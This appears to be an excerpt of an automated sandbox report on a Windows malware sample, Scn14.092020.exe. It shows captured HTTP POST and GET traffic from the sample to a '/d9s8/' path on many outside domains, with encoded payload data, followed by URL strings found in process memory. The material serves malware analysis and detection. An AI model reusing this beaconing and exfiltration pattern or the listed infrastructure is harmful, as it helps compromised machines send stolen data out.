00 Data Ascii: 
vP=1IETRzkEwWPYPRdsOfcF2BoIcC(fgIcJsxqv8zEVvOo3ECiLlnw1BLAyoUkVOludO0OMpQg7YfTvcvEnultsO_182xa-erVJmZ3yWESTGgeVthrxe_rVGDb6GINSY5jW1YhOSPk_1rm6pycxRMHFDl1h5Hy-D81ZW0hFAS5q21McZQRJT4jdexVHtvC6YFpt(ugF5Z(vqEC9x3fTEAo8OFm_re3PGL6vfRrCJfl0dpssWVIIdgB_cJDoeOE5MRv1VD6Kd9eWRF6NP0VM0C5blanGS3BkqCIoEpLNXwpHSWvW103BYUaV3xuTuh1m4DlQ2I64ZQW1Ya2G6M~2C0Y2cpwxJg5jBqUOVfaJE0zZqZmbEbtiVpKHtYkAMnX15VNMUvJE6kt0xpBR(M85qA).
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.nittayabeauty.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.nittayabeauty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nittayabeauty.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 50 3d 72 77 74 70 4a 5a 31 6c 70 58 58 6a 44 67 56 49 33 4f 34 61 77 72 37 6c 49 5f 51 57 79 61 33 31 6f 50 33 48 50 65 65 69 47 75 6e 75 62 41 79 68 48 33 4e 6a 70 66 6d 43 67 56 4e 31 56 61 35 7a 64 51 4a 67 28 4b 65 32 64 34 4a 72 61 75 77 61 57 36 62 47 45 68 7a 4e 31 37 64 76 5a 36 33 6c 7a 4c 35 6c 55 72 43 4c 56 4a 32 59 28 67 51 48 78 6f 34 70 4e 52 30 57 37 63 44 7a 47 75 45 61 61 39 47 31 4e 2d 45 36 75 5f 6a 45 6b 32 6f 38 36 73 61 7a 39 66 43 35 58 36 51 5a 4e 36 4e 30 6a 34 71 4d 45 50 41 44 58 36 4b 77 58 33 55 67 32 30 6d 35 56 56 70 65 64 51 6b 36 48 64 6a 70 4b 6e 4d 4e 38 41 58 75 66 39 47 6f 61 4c 67 68 57 65 50 48 78 41 55 77 7a 78 42 63 6b 4c 45 37 30 56 76 47 41 77 28 50 38 49 67 2d 70 4b 70 7a 47 4c 4d 33 53 48 61 49 31 55 71 41 6f 32 36 6c 44 53 6f 52 36 6d 36 57 69 59 6a 70 71 65 45 42 7e 56 7a 6d 5a 75 38 6b 62 7a 65 2d 6c 4e 56 6a 54 78 61 37 4e 50 7e 2d 7e 71 4c 4d 31 52 30 5f 41 7a 6c 6a 35 43 32 6e 39 62 34 72 76 62 50 5f 51 31 41 4f 4f 77 57 46 4f 33 4c 51 6f 31 35 46 54 37 77 58 32 50 51 79 67 2d 4e 50 64 73 7e 4b 39 53 65 69 77 48 54 2d 28 51 4d 34 51 6b 75 6a 34 6e 6e 4a 53 77 4f 66 4d 61 6b 30 33 44 76 6b 31 74 66 49 52 46 48 38 46 4b 78 7a 39 4c 30 74 79 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
vP=rwtpJZ1lpXXjDgVI3O4awr7lI_QWya31oP3HPeeiGunubAyhH3NjpfmCgVN1Va5zdQJg(Ke2d4JrauwaW6bGEhzN17dvZ63lzL5lUrCLVJ2Y(gQHxo4pNR0W7cDzGuEaa9G1N-E6u_jEk2o86saz9fC5X6QZN6N0j4qMEPADX6KwX3Ug20m5VVpedQk6HdjpKnMN8AXuf9GoaLghWePHxAUwzxBckLE70VvGAw(P8Ig-pKpzGLM3SHaI1UqAo26lDSoR6m6WiYjpqeEB~VzmZu8kbze-lNVjTxa7NP~-~qLM1R0_Azlj5C2n9b4rvbP_Q1AOOwWFO3LQo15FT7wX2PQyg-NPds~K9SeiwHT-(QM4Qkuj4nnJSwOfMak03Dvk1tfIRFH8FKxz9L0tyQ).
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.ashleygrady.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.ashleygrady.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ashleygrady.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 50 3d 35 7a 46 62 64 32 4b 48 67 36 74 6c 62 34 70 42 56 4d 44 33 46 4c 6a 34 4d 6d 76 79 4d 73 37 66 59 62 78 71 44 5a 7e 74 32 4e 7e 56 6f 51 33 42 6c 58 33 38 69 7a 69 66 61 77 43 62 28 70 4e 59 61 35 30 66 30 6e 35 73 7e 69 42 34 30 5f 33 56 65 78 63 67 36 56 43 36 49 59 59 2d 69 5f 6b 4f 78 62 56 6b 43 6f 7a 45 55 35 73 70 51 6d 48 68 57 52 34 72 6d 52 6f 66 38 68 6c 73 34 45 61 6a 6f 48 42 78 4f 36 6b 6f 55 38 4d 74 52 6e 52 4d 76 59 52 47 75 42 52 78 58 2d 73 45 45 6c 67 53 68 62 41 52 39 77 4d 4b 5a 33 33 4d 56 52 35 70 46 6b 54 46 6b 38 53 61 33 53 63 36 49 67 70 43 71 69 35 65 65 54 56 2d 69 34 51 69 62 5a 4a 7a 78 4b 55 79 55 42 41 64 36 52 37 6b 48 75 37 6f 59 77 35 53 5a 6f 4c 48 43 72 70 36 67 73 72 56 67 49 67 76 69 69 4b 58 4d 4c 73 34 54 35 46 50 32 50 42 39 32 72 74 4b 4e 42 62 31 7e 44 78 66 62 47 48 6b 42 64 43 59 6a 32 30 48 56 4f 31 55 61 42 33 44 6b 48 4d 44 38 56 57 5a 58 46 41 51 37 44 62 4c 6f 6f 32 61 65 50 42 7a 30 76 58 75 76 76 69 6e 36 78 42 52 59 45 75 37 41 6d 52 46 31 62 72 51 68 6e 47 36 75 31 46 43 66 77 73 5a 4c 31 5a 75 4a 75 48 44 73 35 54 55 4c 37 30 4e 77 44 4e 48 57 55 52 5f 6b 33 7e 77 28 5a 54 57 54 42 7e 6c 77 6f 74 67 55 57 78 6c 30 37 51 62 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
vP=5zFbd2KHg6tlb4pBVMD3FLj4MmvyMs7fYbxqDZ~t2N~VoQ3BlX38izifawCb(pNYa50f0n5s~iB40_3Vexcg6VC6IYY-i_kOxbVkCozEU5spQmHhWR4rmRof8hls4EajoHBxO6koU8MtRnRMvYRGuBRxX-sEElgShbAR9wMKZ33MVR5pFkTFk8Sa3Sc6IgpCqi5eeTV-i4QibZJzxKUyUBAd6R7kHu7oYw5SZoLHCrp6gsrVgIgviiKXMLs4T5FP2PB92rtKNBb1~DxfbGHkBdCYj20HVO1UaB3DkHMD8VWZXFAQ7DbLoo2aePBz0vXuvvin6xBRYEu7AmRF1brQhnG6u1FCfwsZL1ZuJuHDs5TUL70NwDNHWUR_k3~w(ZTWTB~lwotgUWxl07Qbng).
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.aktivasi-asuransi-bukalapak.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.aktivasi-asuransi-bukalapak.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.aktivasi-asuransi-bukalapak.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 50 3d 39 53 59 6c 46 66 56 34 54 32 31 36 57 77 71 71 64 77 76 69 56 37 56 36 6b 59 4d 78 34 30 73 73 67 78 44 70 48 49 28 32 50 34 65 78 52 6d 44 38 54 39 67 56 4b 67 37 53 70 4c 6d 4c 68 53 78 55 51 2d 4a 79 78 49 56 39 4a 51 38 56 63 7a 38 6a 6c 77 71 79 44 4b 4a 4c 51 6c 74 78 55 30 53 4a 77 69 4d 79 39 34 55 72 6a 45 58 4a 4c 4c 65 30 47 50 56 4f 63 59 54 41 79 39 58 76 30 4b 41 39 5a 5f 7e 4d 4d 74 74 64 79 57 35 65 42 73 51 67 55 2d 55 30 31 75 70 66 4d 77 6d 48 36 56 49 65 4f 64 6b 6e 35 52 71 61 6b 6c 45 55 66 37 42 30 58 65 6b 46 6e 45 45 4a 71 66 44 68 73 53 46 73 58 56 36 78 4c 77 52 75 4d 69 46 69 51 50 48 33 34 4c 35 69 4d 46 28 62 4a 71 59 5a 47 57 51 30 54 30 41 75 31 7a 78 2d 49 32 53 35 68 51 71 77 6a 5a 44 73 70 30 32 32 57 43 30 54 38 35 49 41 75 35 79 49 4d 6d 6e 4d 66 65 41 53 68 30 6b 78 50 45 31 42 68 49 57 54 6e 6a 61 47 53 4f 72 45 4d 72 31 64 75 36 5a 62 45 55 65 6a 5a 6d 58 36 58 6a 49 6d 42 63 79 52 68 35 42 67 77 75 78 68 6d 70 6b 71 54 78 77 44 4e 4e 41 41 6e 75 56 55 50 71 47 6d 59 41 5a 4b 30 4e 4a 6f 56 6d 6d 42 55 7a 4e 6a 69 5f 66 74 6a 30 4c 35 73 41 6f 32 63 74 48 55 42 5a 6b 52 76 69 30 70 4a 41 51 7a 43 2d 76 6c 39 31 74 54 75 37 35 4f 41 73 4e 73 34 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
vP=9SYlFfV4T216WwqqdwviV7V6kYMx40ssgxDpHI(2P4exRmD8T9gVKg7SpLmLhSxUQ-JyxIV9JQ8Vcz8jlwqyDKJLQltxU0SJwiMy94UrjEXJLLe0GPVOcYTAy9Xv0KA9Z_~MMttdyW5eBsQgU-U01upfMwmH6VIeOdkn5RqaklEUf7B0XekFnEEJqfDhsSFsXV6xLwRuMiFiQPH34L5iMF(bJqYZGWQ0T0Au1zx-I2S5hQqwjZDsp022WC0T85IAu5yIMmnMfeASh0kxPE1BhIWTnjaGSOrEMr1du6ZbEUejZmX6XjImBcyRh5BgwuxhmpkqTxwDNNAAnuVUPqGmYAZK0NJoVmmBUzNji_ftj0L5sAo2ctHUBZkRvi0pJAQzC-vl91tTu75OAsNs4Q).
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=HNt6bE8MfKrAhK/pt1sF0411gOBLJ9Uo/gJYn3fY8ue0UhpQnU4ulW+T1ESascm7BSDz HTTP/1.1Host: www.nola3d.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?vP=cO0bqnodE8Uodepscc2XXc+fybp4dBOkcNItlx0mXpHFPbxkNxOWsoUK9YvQ74iaK1ga&2de=Rzu4ZZ-XVT HTTP/1.1Host: www.keebcat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=viBS6Wze00HUNqFEE58ery/tqe73OVEI1otdtPhhnn8HDYG2Px46lSa5vpvmwenp9VWv HTTP/1.1Host: www.chehol.directoryConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?vP=VEf8k5jTZUymsLuztDlUroR4Tha6hY/2aUGXaeeuAgJZc/heECk8lEdTluj46t1OBa8z&2de=Rzu4ZZ-XVT HTTP/1.1Host: www.jblmhomestore.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=iaRy2CcIG08yRATteF/h4niYl8g0zTtWlPvlrUXVcPKgWlu5QOCPyX+cRpPsLMouC6x2 HTTP/1.1Host: www.theghostfestival.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?vP=06wv+NhoHjlhWQUEJX2w+vK/IFNJKXsiSbpyW5561s6/I+0VZrqwpkfEjDU5XNQldOlk&2de=Rzu4ZZ-XVT HTTP/1.1Host: www.thebardi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=3F4BTbkTDsrb23tZAXb3hdJ3+Zxxneo5KOr91LRTQbT8RfY+vB5Yp2XFHvJayoJ2l/qV HTTP/1.1Host: www.martjeje2.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?vP=dLiHs7tqNZzpikHCi85ytJ6zSazBJfKYHrDOt6j0CIH249LGHEOsf8+JagFD9t222TfN&2de=Rzu4ZZ-XVT HTTP/1.1Host: www.isabellelinhnguyen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=KZXmcMedBwfhNG72Yprv36X6G3gBjgWEN6ED81KrdGuEeSGip76GxhQuMTXo2uu4NyLJ HTTP/1.1Host: www.revolucaomindfulness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?vP=rlkmmCaXt+AMyrw/MBwq/BSknyHni0kPKYXwYo5rBrAjCFj+y3ydrJyfUTRA3QRnBG+G&2de=Rzu4ZZ-XVT HTTP/1.1Host: www.krewebijoux.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=6KwpPXUiwFX7ZBA9OodNm3YLSATd2KUq4kH3sDUsuv0xVz64ikFWE+1HwWsjSUW/OVbp HTTP/1.1Host: www.environmentsafetymemphis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?vP=kyZTX99LiW/icy84gI8HitXVOdgKxOvA9fmCXsGAN7TtQxOyGGUpuanA90d4Z59dcBU3&2de=Rzu4ZZ-XVT HTTP/1.1Host: www.nittayabeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=2xxhDTKogYVwMqkKCpG9QsOba3/Ca+nzIrlpYJOr5IqlgQrpv0G7wV/gFSfl3ZRuG6Nl HTTP/1.1Host: www.ashleygrady.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?vP=yQsfb6F+aE13Jx6qI3j1CMlHibkP501s7Hi6bb3WKNeqcCrzTo1bPmy/qOyDoR5/Ss4I&2de=Rzu4ZZ-XVT HTTP/1.1Host: www.aktivasi-asuransi-bukalapak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.nola3d.com
          Source: unknownHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.keebcat.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.keebcat.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.keebcat.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 50 3d 54 4d 41 68 30 41 6f 5f 46 75 46 5a 46 70 59 77 42 63 76 61 57 4b 65 46 6c 59 4a 53 53 30 79 42 4d 71 70 56 28 6a 38 47 65 4c 76 77 4f 6f 5a 56 43 56 76 34 73 38 64 48 7e 71 50 44 39 71 57 47 4e 31 56 45 73 77 54 4b 37 57 6a 37 46 36 7a 67 42 5f 56 73 6a 73 6b 5f 31 62 44 74 34 45 74 45 4b 42 4f 5a 54 38 5a 30 47 62 31 6f 4e 34 69 6d 78 32 76 36 66 58 33 38 67 57 75 4c 47 33 44 4c 6b 42 56 50 34 5f 78 61 46 30 31 59 6f 58 45 34 66 77 28 52 43 50 46 45 32 32 38 53 6a 2d 41 41 49 33 35 65 4a 71 69 51 73 50 32 6d 4e 47 42 44 71 4d 7e 58 56 64 59 43 47 47 69 69 54 57 44 4c 67 5a 31 55 4c 62 67 71 78 6a 43 6f 7e 73 48 58 6a 57 66 62 39 4e 78 4c 78 70 38 76 73 6a 77 4a 49 49 66 6f 48 34 72 38 48 4b 46 74 55 6e 31 5f 59 30 6f 4e 37 6c 4b 41 70 47 70 48 4e 70 4c 6d 7e 41 6d 32 36 39 6c 76 32 67 34 74 70 39 6e 39 36 32 70 70 63 66 48 47 45 72 4c 4e 6e 65 74 54 6e 63 53 35 68 4a 48 66 76 73 57 6d 36 46 68 67 61 54 4b 44 59 6b 7a 47 70 62 71 30 7e 31 6f 59 57 7a 6d 6b 48 65 30 56 6c 6d 76 69 59 52 47 57 62 2d 43 4e 66 43 6e 49 70 70 28 4b 55 31 64 43 59 6e 34 34 4c 53 50 5a 74 6a 66 6d 4b 77 50 44 49 42 67 74 6e 73 34 6c 47 6d 43 38 4d 32 7a 4f 66 4d 64 4a 78 74 4e 67 38 65 74 55 74 74 73 31 75 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
vP=TMAh0Ao_FuFZFpYwBcvaWKeFlYJSS0yBMqpV(j8GeLvwOoZVCVv4s8dH~qPD9qWGN1VEswTK7Wj7F6zgB_Vsjsk_1bDt4EtEKBOZT8Z0Gb1oN4imx2v6fX38gWuLG3DLkBVP4_xaF01YoXE4fw(RCPFE228Sj-AAI35eJqiQsP2mNGBDqM~XVdYCGGiiTWDLgZ1ULbgqxjCo~sHXjWfb9NxLxp8vsjwJIIfoH4r8HKFtUn1_Y0oN7lKApGpHNpLm~Am269lv2g4tp9n962ppcfHGErLNnetTncS5hJHfvsWm6FhgaTKDYkzGpbq0~1oYWzmkHe0VlmviYRGWb-CNfCnIpp(KU1dCYn44LSPZtjfmKwPDIBgtns4lGmC8M2zOfMdJxtNg8etUtts1uw).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 14 Sep 2020 14:48:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: Scn14.092020.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: Scn14.092020.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: explorer.exe, 00000002.00000000.401753185.000000000E24F000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: Scn14.092020.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: Scn14.092020.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: Scn14.092020.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: Scn14.092020.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/kwbg.jpg)
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/libg.png)
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/bodybg.png)
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.2
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/arrow.png)
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/libgh.png)
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/logo.png)
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/search-icon.png)
          Source: Scn14.092020.exeString found in binary or memory: http://ocsp.digicert.com0C
          Source: Scn14.092020.exeString found in binary or memory: http://ocsp.digicert.com0O
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://winp112727.myorderbox.com/linkhandler/servlet/RenewDomainServlet?validatenow=false&amp;orderi
          Source: explorer.exe, 00000002.00000002.640672802.0000000002280000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.397117506.0000000007CC8000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/Dental_Plans.cfm?fp=Q7iQpe6GNwnMOS1htDQTVXINOcIWNsnSVF4GJ4qReeIjjk%2Fb8
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/Free_Credit_Report.cfm?fp=Q7iQpe6GNwnMOS1htDQTVXINOcIWNsnSVF4GJ4qReeIjj
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/Health_Insurance.cfm?fp=Q7iQpe6GNwnMOS1htDQTVXINOcIWNsnSVF4GJ4qReeIjjk%
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/Healthy_Weight_Loss.cfm?fp=Q7iQpe6GNwnMOS1htDQTVXINOcIWNsnSVF4GJ4qReeIj
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/Top_Smart_Phones.cfm?fp=Q7iQpe6GNwnMOS1htDQTVXINOcIWNsnSVF4GJ4qReeIjjk%
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/d9s8/?vP=kyZTX99LiW/icy84gI8HitXVOdgKxOvA9fmCXsGAN7TtQxOyGGUpuanA90d4Z5
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/display.cfm
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/fashion_trends.cfm?fp=Q7iQpe6GNwnMOS1htDQTVXINOcIWNsnSVF4GJ4qReeIjjk%2F
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/music_videos.cfm?fp=Q7iQpe6GNwnMOS1htDQTVXINOcIWNsnSVF4GJ4qReeIjjk%2Fb8
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/px.js?ch=1
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/px.js?ch=2
